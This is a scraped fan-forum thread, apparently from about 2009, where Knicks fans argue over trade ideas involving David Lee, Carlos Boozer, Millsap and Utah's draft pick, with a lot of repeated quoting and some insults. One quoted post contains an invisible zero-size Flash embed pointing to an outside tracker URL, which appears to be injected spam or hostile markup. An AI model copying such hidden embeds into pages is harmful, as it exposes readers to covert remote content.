if millsap ends up with the trailmix before boozer gets sent to the bullshits, s&t

ANU

Starter
if millsap ends up with the trailmix before boozer gets sent to the bullshits, s&t

lee to utah for our first round pick.:D

i think utah will keep one or the other but on the chance that both end up elsewhere, this should definitely get considered.

DANUTZ39

Benchwarmer
lee to utah for our first round pick.:D

i think utah will keep one or the other but on the chance that both end up elsewhere, this should definitely get considered.

No we should not consider this. Walsh will never do this.

If knicks do this then we have (to tank this sesson) to be the the worse team in nba in order to get a top 3 pick. That means 2010 FA will have a even harder time considering signing with us.

ANU

Starter
we won't have to worry about any 2010 free agents if they resign lee.cause they aint comin' for the money we'd be offering.lee ain't won shit in his life.you think having the chance to play with lee is gonna bring lebron or wade to come here?lol.

and no we don't have to tank the season.I'm not for tanking at all.I'm for letting the young guys(gallo, hill,chandler) play.

Arod2k9

Benchwarmer
No we should not consider this. Walsh will never do this.

If knicks do this then we have (to tank this sesson) to be the the worse team in nba in order to get a top 3 pick. That means 2010 FA will have a even harder time considering signing with us.

Utah owns our 2010 lottery unprotected first round pick (2004 Marbury Suns Trade, Suns then trade it to Jazz for cap relief move). There is no reason to tank next season and we have to win as many games as possible and aim for the 8th spot in the playoffs. As we stand I don't see us being a playoff team as the Eastern Conference is getting bigger and stronger. I still feel wish a couple of moves we should be fighting for that last spot but Detroit, Boston, Toronto, Orlando, Wizards all got much better and the Bulls are on the verge of getting Bozzer so they will also be great next season.

<input id="gwProxy" type="hidden"><!--Session data--><input onclick="jsCall();" id="jsProxy" type="hidden">

DANUTZ39

Benchwarmer
Utah owns our 2010 lottery unprotected first round pick (2004 Marbury Suns Trade, Suns then trade it to Jazz for cap relief move). There is no reason to tank next season and we have to win as many games as possible and aim for the 8th spot in the playoffs. As we stand I don't see us being a playoff team as the Eastern Conference is getting bigger and stronger. I still feel wish a couple of moves we should be fighting for that last spot but Detroit, Boston, Toronto, Orlando, Wizards all got much better and the Bulls are on the verge of getting Bozzer so they will also be great next season.

<INPUT id=gwProxy type=hidden><!--Session data--><INPUT id=jsProxy onclick=jsCall(); type=hidden>

If you dont jump, and read what the poster above me wrote you will get what i meant. I know utah owns our unprotected pick next year but if (like anu said) we trade d lee for our pick back what we going to do?

If we make the playoffs then we traded d lee for a 15-20 pick (not worth)and if we tank the seasson we become even more unatractive for the 2010 FA(even more worse).

If we dont resign Lee I think we can get better deals for him this year or next so we should not consider dealing with utah for our pick back.

Anyway this is pointless since we can't trade D LEE for only our pick back. Utah dont have the cap to sign Lee and in a sign and trade we have to take salary back.

BernardKing

Rookie
Interesting thread. Utah is on my list of possible Lee destinations via sign-and-trade, but I want to dump salary in the process.

Utah was hoping to unload Boozer in that 3/way deal that just fell through. That could’ve prevented the Millsap offer sheet, because it could've given Utah leeway to extend Millsap themselves (possibly for lower $$$)...

Now Millsap is signed to a hefty offer sheet, and Utah can’t realistically match it because that'll put them about 13.5 mil over the luxury tax threshold. It's too bad for them, because they were hoping for Millsap to replace Boozer as their starting power forward for years to come...

No Millsap, means Utah needs their power forward of the future. Boozer is entering the final year of his deal, and they’re trying to trade him. They want to get under the luxury tax threshold (they're about 3.5 mil over).

OK, here’s what I propose:

DLee + Jeffries for Boozer

They get their PF of the future (Lee) and we get out from under the Jeffries contract. They also save about 4.5 mil in salary + luxury tax from this year’s cap.

Last edited:

ANU

Starter
Interesting thread. Utah is on my list of possible Lee destinations via sign-and-trade, but I want to dump salary in the process.

Utah was hoping to unload Boozer in that 3/way deal that just fell through. That could?ve prevented the Millsap offer sheet, because it could've given Utah leeway to extend Millsap themselves (possibly for lower $$$)...

Now Millsap is signed to a hefty offer sheet, and Utah can?t realistically match it because that'll put them about 12 mil over the luxury tax threshold. It's too bad for them, because they were hoping for Millsap to replace Boozer as their starting power forward for years to come...

No Millsap, means Utah needs their power forward of the future. Boozer is entering the final year of his deal, and they?re trying to trade him. They want to get under the luxury tax threshold (they're about 3.5 mil over).

OK, here?s what I propose:

DLee + Jeffries for Boozer

They get their PF of the future (Lee) and we get out from under the Jeffries contract. They also save about 4.5 mil in salary + luxury tax from this year?s cap.
i'd prefer getting that number 1 back, i think jeffries isn't as difficult to get rid of as some might think.

SSj4Wingzero

All Star
You do have a point. If we could get rid of Jerome James...

I mean the thing with Jeffries is we have to trade him to a team not looking to buy into the free agent market in 2010. We also have to trade him to a team that for some reason wants his services.

The answer, my friends, is the Washington Wizards. A Mike James for Jared Jeffries swap would be a move that the Wizards should be more than willing to pull the trigger on. The last time the Wizards were good, they had Jared Jeffries and his defense. The Wizards clearly don't need cap space in 2010, they're over the 2010 cap as it is right now. Seriously I don't know why Walsh hasn't pulled the Mike James for Jared Jeffries deal yet

BernardKing

Rookie
i'd prefer getting that number 1 back, i think jeffries isn't as difficult to get rid of as some might think.

As far as Boozer to the Bulls... I was relieved when that 3/way trade fell through. Here's why: Knick fans need to hope that K. Hinrich stays put. His contract is an albatross to the Bulls as far as their free agent shopping next summer. Bulls fans would've been ecstatic if that deal went through.

As far as your trade idea w/ getting our #1 back... That trade proposal would have to include getting back Kyle Korver, to match up salaries with DLee's BYC number. I hope you're right about Jeffries. :afro:

BernardKing

Rookie
hahahahahh

Utah giving us carlos booozer for jefferies and Leee hahahah

thats comedy right there.

DLee and Boozer getting swapped is laughable? It?s common knowledge that Boozer is a better player than Lee, but you?re post implies that they shouldn?t even be compared with eachother.

Why do you think they?re not comparable? Lee put up 16 and 12 last year. He led the NBA in double doubles last year. He did so while shooting an impressive 55% from the field.

Everyone knows Boozer has the better resume and plays better interior defense, but neither guy blocks shots. I question you?re knowledge when you imply that these two players shouldn?t be mentioned in the same breath.

Maybe you were so impressed with Boozer?s knee surgery last season that limited him to 37 games... LOL

Maybe you don?t realize that uneven trades happen in the NBA all the time, because of the business side of the sport. Did you forget that just recently a still highly productive Shaquille O'Neal (future hall of famer and current NBA all star) got traded to the Cavs for bench warmer Sasha Pavlovic and washed up Ben Wallace who is talking RETIREMENT.

LOL
:machinegun:

DLee and Boozer getting swapped is laughable? It?s common knowledge that Boozer is a better player than Lee, but you?re post implies that they shouldn?t even be compared with eachother.

Why do you think they?re not comparable? Lee put up 16 and 12 last year. He led the NBA in double doubles last year. He did so while shooting an impressive 55% from the field.

Everyone knows Boozer has the better resume and plays better interior defense, but neither guy blocks shots. I question you?re knowledge when you imply that these two players shouldn?t be mentioned in the same breath.

Maybe you were so impressed with Boozer?s knee surgery last season that limited him to 37 games... LOL

Maybe you don?t realize that uneven trades happen in the NBA all the time, because of the business side of the sport. Did you forget that just recently a still highly productive Shaquille O'Neal (future hall of famer and current NBA all star) got traded to the Cavs for bench warmer Sasha Pavlovic and washed up Ben Wallace who is talking RETIREMENT.

LOL
:machinegun:

yeah exactly they shouldnt be compared together

boozer has been consistently better coached by the same hall of famer for a few years,

boozer has been on a winning playoff team that went to the eastern conference finals two years ago

boozer is a bonafied all star big in the western conference

boozer has been a consistent top ten rebounder his entire career

boozer plays defense

boozer hits mid range jumpers with consistency

boozer passes out of double teams

boozer has been starting material since his first nba game

boozer put up DLEE numbers in his second season as a pro

boozer put up 20 pnts just under 14 rebs a game against the lakers bynum and gasol this post season

boozer is only a year and a half older than lee

boozer has avg a steal per game for the past 3 seasons

boozers career playoff avgs are 20 and 12 in 34 games

DLEE

well basically he has done none of that.

end of story,

BernardKing

Rookie
yeah exactly they shouldnt be compared together

boozer has been consistently better coached by the same hall of famer for a few years,

boozer has been on a winning playoff team that went to the eastern conference finals two years ago

boozer is a bonafied all star big in the western conference

boozer has been a consistent top ten rebounder his entire career

boozer plays defense

boozer hits mid range jumpers with consistency

boozer passes out of double teams

boozer has been starting material since his first nba game

boozer put up DLEE numbers in his second season as a pro

boozer put up 20 pnts just under 14 rebs a game against the lakers bynum and gasol this post season

boozer is only a year and a half older than lee

boozer has avg a steal per game for the past 3 seasons

boozers career playoff avgs are 20 and 12 in 34 games

DLEE

well basically he has done none of that.

end of story,

Thank you Captain Obvious for dramatically explaining what I have already stated. My exact quote was: "It?s common knowledge that Boozer is a better player than Lee."

The fact that you ignorantly scoffed at the idea that they could be traded for each other, shows that you know jack sh*t about the business side of basketball. I have news for you: Lebron is not king, the salary cap is. Sometimes the talent matches up in a trade, and sometimes it doesn't, but the salaries match up for cap purposes. I'm surprised that you don't know this by now.

You scoff at the idea of a Lee/Jeffries for Boozer deal, yet you conveniantly didn't respond to this part of my post:

I'll start taking you seriously when you finally study this: http://members.cox.net/lmcoon/salarycap.htm

Until then, enjoy being "Captain Obvious".

Thank you Captain Obvious for dramatically explaining what I have already stated. My exact quote was: "It?s common knowledge that Boozer is a better player than Lee."

The fact that you ignorantly scoffed at the idea that they could be traded for each other, shows that you know jack sh*t about the business side of basketball. I have news for you: Lebron is not king, the salary cap is. Sometimes the talent matches up in a trade, and sometimes it doesn't, but the salaries match up for cap purposes. I'm surprised that you don't know this by now.

You scoff at the idea of a Lee/Jeffries for Boozer deal, yet you conveniantly didn't respond to this part of my post:

I'll start taking you seriously when you finally study this: http://members.cox.net/lmcoon/salarycap.htm

Until then, enjoy being "Captain Obvious".

haha, figured you needed help understanding.

latiger12

Rookie
hahahahahh

Utah giving us carlos booozer for jefferies and Leee hahahah

thats comedy right there<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>.

Heah, I got a good laugh too...not gonna happen!

BernardKing

Rookie
Heah, I got a good laugh too...not gonna happen!

Of course, because 99% of fans? trade ideas don?t end up happening. The salaries would match up on this one though.

It?s obvious by your reaction to my trade idea, that you don?t think highly of David Lee. Ok, but I seem to remember you saying that David Lee was ?just a hair? away from becoming an ?elite? player.

Yes, here it is. It?s from when you were discussing David Lee. It?s your own words:
</P>He needs to up his game just a hair and he can be an elite player. http://www.knicksonline.com/forums/showthread.php?p=86577#post86577

So which is it? Do you think highly of Lee or not? On the one hand, with only 24 games left last season, you stated that Lee is ?just a hair? away from being ?elite?. If that?s true, then couldn?t he easily be part of a Boozer trade? Let me know when you figure it out. LOL